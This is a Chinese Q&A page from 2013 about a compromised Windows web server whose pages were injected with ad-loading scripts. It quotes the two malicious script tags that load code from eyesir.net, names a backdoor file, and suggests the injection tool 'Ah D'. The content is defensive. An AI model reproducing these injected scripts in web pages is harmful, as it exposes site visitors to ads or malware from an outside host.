(病毒安全)服务器被中了木马,如何清除
2013-05-29 15:26
323 查看
问:
今日发现我服务器上所有站点打开皆有一段莫明其妙的广告弹出,查看原文件让我惊讶了,代码中被植入了一段Js脚本<script src="http://iisa1.eyesir.net:7777/gethostjs.php" language="javascript"></script> ,
有时候会变成:
<script>var sUrl='http://www.eyesir.net:60000/ads.php?REFERER='+window.location;var _script = document.createElement('script');_script.setAttribute('type', 'text/javascript');_script.setAttribute('src',
sUrl);document.getElementsByTagName('head')[0].appendChild(_script);</script>
仔细查看服务器上的web页面没有发现什么异常情况,文件修改日期也没有更改过。 后来使用金山毒霸查了一遍,发现一个病毒木马(C:\WINDOWS\system32\wswinds.dat Backdoor.IRC.Pangu.a),再访问网站发现广告消失 了,查看源码那段异常代码也消失了。后来发现在目录C:\WINDOWS\system32下还有几个异常文件wswinds.com 和perfc009.dat和perfh009.dat,我想也得把这干掉,否则会有麻烦哦。
通过金山清除之后当时发现已经好了,但是过几天后又出现了,再用金山毒霸杀也没有发现有任何异常现象.
但是截至目前位置还不知道这木马是咋种上去的,有知情者麻烦告知我,我将感激不尽的。
答:
这是一种典型的挂马,黑客将你的服务器攻陷后(有时甚至不用攻陷),通过修改你网站代码,来达到抓肉鸡,赚取点击量或者其他什么目的。
首先,第一次出现的代码是比较原始的窗口弹出(就是将"http://iisa1.eyesir.net:7777/gethostjs.php"中的广告以窗口方式弹出)而第二次的代码是经过修改的(实际上也是达到同样的目的,但通过修改代码,用等价代码替换,可以绕过杀软的查杀,但庆幸的是最后还是被查杀了)
要做到这个其实不难,这个黑客最有可能是通过注入,得到网站后台密码,再上传木马,得到webshell,在通过webshell来上传修改过的网站源码。另外,跨站方式也是有可能的,如果你的服务器有多个网站,黑客就可以通过别的网站来控制服务器,进而修改你的网站。还有其他方式比如弱口令等,但概率不大。
我推荐你一个黑客工具:啊D,你到网上搜一下,下载下来,可以用它来检测你的网站是否有注入漏洞。
最后提醒你一句:自从出现了黑客,网站都没有绝对安全。既然黑客已经入侵了你的服务器,说明你的网站绝对有漏洞,要尽快修补。还有,按照惯例,黑客入侵后一般会在服务器中留后门或是木马(而且很有可能经过免杀,杀软查不出来),你即使将刚才几个东西删除了,黑客还有可能卷土重来。最后,即将广告代码删了,保不齐黑客还会在服务器中留其他挂马语句(而且被修改的更变态,杀软无法查出,或是这句挂马语句不是用来弹窗的,而是用来植入木马的,这种挂马如果做得好根本没有任何外在表现)
祝你好运。
今日发现我服务器上所有站点打开皆有一段莫明其妙的广告弹出,查看原文件让我惊讶了,代码中被植入了一段Js脚本<script src="http://iisa1.eyesir.net:7777/gethostjs.php" language="javascript"></script> ,
有时候会变成:
<script>var sUrl='http://www.eyesir.net:60000/ads.php?REFERER='+window.location;var _script = document.createElement('script');_script.setAttribute('type', 'text/javascript');_script.setAttribute('src',
sUrl);document.getElementsByTagName('head')[0].appendChild(_script);</script>
仔细查看服务器上的web页面没有发现什么异常情况,文件修改日期也没有更改过。 后来使用金山毒霸查了一遍,发现一个病毒木马(C:\WINDOWS\system32\wswinds.dat Backdoor.IRC.Pangu.a),再访问网站发现广告消失 了,查看源码那段异常代码也消失了。后来发现在目录C:\WINDOWS\system32下还有几个异常文件wswinds.com 和perfc009.dat和perfh009.dat,我想也得把这干掉,否则会有麻烦哦。
通过金山清除之后当时发现已经好了,但是过几天后又出现了,再用金山毒霸杀也没有发现有任何异常现象.
但是截至目前位置还不知道这木马是咋种上去的,有知情者麻烦告知我,我将感激不尽的。
答:
这是一种典型的挂马,黑客将你的服务器攻陷后(有时甚至不用攻陷),通过修改你网站代码,来达到抓肉鸡,赚取点击量或者其他什么目的。
首先,第一次出现的代码是比较原始的窗口弹出(就是将"http://iisa1.eyesir.net:7777/gethostjs.php"中的广告以窗口方式弹出)而第二次的代码是经过修改的(实际上也是达到同样的目的,但通过修改代码,用等价代码替换,可以绕过杀软的查杀,但庆幸的是最后还是被查杀了)
要做到这个其实不难,这个黑客最有可能是通过注入,得到网站后台密码,再上传木马,得到webshell,在通过webshell来上传修改过的网站源码。另外,跨站方式也是有可能的,如果你的服务器有多个网站,黑客就可以通过别的网站来控制服务器,进而修改你的网站。还有其他方式比如弱口令等,但概率不大。
我推荐你一个黑客工具:啊D,你到网上搜一下,下载下来,可以用它来检测你的网站是否有注入漏洞。
最后提醒你一句:自从出现了黑客,网站都没有绝对安全。既然黑客已经入侵了你的服务器,说明你的网站绝对有漏洞,要尽快修补。还有,按照惯例,黑客入侵后一般会在服务器中留后门或是木马(而且很有可能经过免杀,杀软查不出来),你即使将刚才几个东西删除了,黑客还有可能卷土重来。最后,即将广告代码删了,保不齐黑客还会在服务器中留其他挂马语句(而且被修改的更变态,杀软无法查出,或是这句挂马语句不是用来弹窗的,而是用来植入木马的,这种挂马如果做得好根本没有任何外在表现)
祝你好运。
相关文章推荐
- 教你如何清除WEB服务器木马
- 教你如何清除WEB服务器木马
- 网络安全:如何查病毒、木马?
- 如何清除木马--104种木马手工清除方法
- 天下数据教你如何保障Apache WEB服务器的安全
- Windows Server2003 防木马权限设置IIS服务器安全配置整理
- [整机笔记][原创]如何清除木马程序Rootkit.Win32.Agent.gs
- 杀毒宝典:如何手动用记事本清除病毒
- linux 服务器中木马及清除木马 推荐
- 高手详解木马程序和病毒的原理和清除的通用解法
- 如何打造一个安全的WEB服务器
- 【讨论】如何实现应用程序对病毒的防护与清除
- 手机客户端和服务器通信时如何安全高效的进行身份验证?
- 菜鸟宝典:用记事本清除病毒的安全技巧
- 如何保证 Linux 服务器的安全
- 文件病毒(病毒安全)绝招:清除不可杀病毒的技巧
- Linux服务器中木马(肉鸡)手工清除方法
- 天下数据叫你如何保证服务器登录安全
- 服务器如何防止木马病毒-安全措施之一(WINDOWS 环境)
- (转)Windows Server2003 防木马权限设置IIS服务器安全配置整理